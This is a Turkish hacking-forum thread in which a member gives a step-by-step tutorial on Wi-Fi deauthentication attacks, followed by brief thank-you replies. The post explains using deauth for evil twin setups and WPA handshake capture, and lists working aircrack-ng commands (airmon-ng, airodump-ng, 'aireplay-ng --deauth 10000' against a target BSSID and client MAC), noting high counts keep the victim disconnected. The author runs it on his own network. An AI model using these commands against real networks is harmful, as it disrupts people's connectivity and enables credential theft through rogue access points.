İPUCU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

Seçenekler

deuth saldırısı nedir? - Yigit Afsar//Bilgi Teknolojileri Kulübü

Yigit Afsar - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2019
Mesajlar:
111
Konular:
57
Teşekkür (Etti):
20
Teşekkür (Aldı):
17
Ticaret:
(0) %
20-05-2019 18:45
#1
deuth saldırısı nedir? - Yigit Afsar//Bilgi Teknolojileri Kulübü
Öncelikle herkese merhaba dostlarım. Ben Yİğit afşar.

Deuth Saldırısı nedir: Bir Wi-Fi deauthentication saldırı türüdür bu saldırı ile bir ağdaki hedef kişiyi wifi ağından düşürmek için kullanılır.
Kısaca anlatmak gerekirse. Modem ve hedef cihaz bir birlerinden ayrılmak istediklerini bildiriyor saldırgan tarafından. Hedef cihaz modeme modem cihaza birbirlerinden ayrıldığını söylüyorlar.

Ne için kullanılır
Şeytan ikiz saldırısı.
Bir wifi ağın aynısından yaratılır. kullanıcıyı bu ikiz kardeşe yönlendirilir sanki kendi orjinal ağına bağlanıyormuş gibi gösterilir saldırgan kişinin ağına giriş yapıldıktan sonra bulunduğu ağ daki kullanıcıların veya hedefin tüm bilgileri ele geçirilir.



Wifi saldırıları ve şifre saldırıları için:
Bir wifi ağının şifresini bulmak için kaba kuvet saldırısı adını verdiğimiz saldırı türü için kullanılır (Genel olarak WPA veya WPA2 Şifreleme türü için kullanulır.).
handshake adını verdiğimiz yani el sıkışma için kullanılır. Böylece saldırganın cihazı ve hedef alınan cihaz bir birlerini tanır bu sayede saldırgan kişinin saldırıları daha başarılı bir şekilde olur.

lazım olan bilgiler: Hedefin mac adresi yeterlidir.

Ben sizlere bir progam ile göstereçeğpim daha kolayıma geldiği için. sizler kendiniz bu saldırının farklı türlerini yaza bilirsiniz.

Gerekli progamın indirilmesi:
Linux Debina tabanlılar için biliyorum ben o yüzden bu her deb tabanlılar için kullanılar bilir.
Terminale sırasıyla assağıdaki kodları yazmanız yeterlidir.
Kod:
sudo apt-get update
Kod:
sudo apt-get install aircrack-ng
aşağıda monitor mod ve çevremizdeki ağları incelemeyi bu ders de anlatacağım ama bilgi edinmek için linkleri bıraktım.

İlk önce monitor moda geçmelisiniz.(Daha önce bir dersde ayrıntılı olarak anlatmıştım.)
Link:https://www.turkhackteam.org/bilgisa...e-cikilir.html
Sonra çevrenizdeki ağları izlemelisiniz.(Daha önce ayrıntılı bir şekilde anlatmış bulunmaktayım)
https://www.turkhackteam.org/siber-g...ri-izleme.html




Uygulama:
BEnim interface im wlp3s0 olduğu için wlp3s0 yazacam siz kendinikisinizi yazınız.
İlk önce sudo su yazarak yönetici olalım.

sonra monitor moda geçelim:
kod
Kod:
airmon-ng start wl3ps0
wlp3s0 yerine kendi interfacenizi yazınız.


2. resimde gördüğünüz gibi monitor moda girdiğimizi söyleyecektir bize.

Şimdi etraftaki ağları tarayalım:
Kod
Kod:
 airodump-ng wlp3s0mon
: unutmayın wlp3s0mon olan yere kendinikinizi yazınız.

https://i.resimyukle.xyz/4WGR19.png
Gördüğünüz gibi çevredeki ağlar ortaya çıkmış bulunkatadır. Burdaki DenemeTHT benim wifi ağım.
saldırımı kendi ağıma yapacağım.
ctrl+c ile durdurunuz.

şimdi gelelim kendi ağımdan bilgi almaya. bu bilgi toplamayı daha ayrıntılı şekilde anlatacağım sonra.

kod:
Kod:
airodump-ng --channel 5 --bssid 70:8A:09:78:2A:D2 wlp3s0mon
. burdaki 5 CH olan bilgidir yani kanal. 70:8A:09:78:2A2 ise modemin bssid si.



ikinci resimde gördüğünüz gibi bir takım bilgiler var. burada STATİON var o benim telefonumun mac adresi.
şimdi saldırıya geçelim.
yeni bir terminal açalım.
ordada root olalım:
Kod:
 sudo su
yazmanız yeterlidir.
kod:
Kod:
aireplay-ng --deauth <yollanacak paket> -a BSSID -c STATION interface
.
örnek
Kod:
:aireplay-ng --deauth 10000 -a 70:8A:09:78:2A:D2 -c 20:6E:9C:23:CA:AF wlp3s0mon




Gördüğünüz gibi 2. resimde paket gönderimi gerçekleşmiştir.
Bu saldırı devam ettikçe kullanıcı ağdan kopacaktır.

ctrl+c ye basarak saldırı sonlandırmış olursunuz.

benim 10000 yazdığım yeri siz istediğiniz gibi değiştire bilirsiniz. 5-10 yaparsanız kopup girecektir 10000 20000 yaparsanız sürekli kopuk kalacaktır saldırı boyunca yani.

sonra monitor moddan çıkmanız lazım.
kod:
Kod:
 airmon-ng stop wlp3s0mon
. wlp3s0mon yazdığım yere kendinize ait olanı yazınız.


umarım açıklayıcı olmuştur Saygılarımla... Bilgi Teknolojileri kulübü. Yiğit Afşar
--------------------- ....
Konu Yigit Afsar tarafından (20-05-2019 18:48 Saat 18:48 ) değiştirilmiştir.
TURKISH STARS, GrandmaPowerful Teşekkür etti.
VaTanSevDal - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
01/2019
Nereden:
İstanbul
Mesajlar:
323
Konular:
32
Teşekkür (Etti):
106
Teşekkür (Aldı):
44
Ticaret:
(0) %
20-05-2019 18:48
#2
Anlatımını beğendim güzel anlatmışsın
Yigit Afsar Teşekkür etti.
Yigit Afsar - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2019
Mesajlar:
111
Konular:
57
Teşekkür (Etti):
20
Teşekkür (Aldı):
17
Ticaret:
(0) %
20-05-2019 18:51
#3
Alıntı:
VaTanSevDal´isimli üyeden Alıntı Mesajı göster
Anlatımını beğendim güzel anlatmışsın
Teşekür ederim. Beğendiyseniz ne mutlu bana
--------------------- ....
TURKISH STARS - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2018
Mesajlar:
1.035
Konular:
15
Teşekkür (Etti):
616
Teşekkür (Aldı):
210
Ticaret:
(0) %
20-05-2019 19:05
#4
Bende anlatımını ve fotoğraflarını beğendim. O yüzden teşekkür butonuna basıyorum ve sadece sözde bırakmamış oluyorum.
---------------------
Son ırmak kuruduğunda, son ağaç kesildiğinde, son balık tutulduğunda, beyaz adam paranın yenmeyecek bir şey olduğunu anlayacak.
Yigit Afsar Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı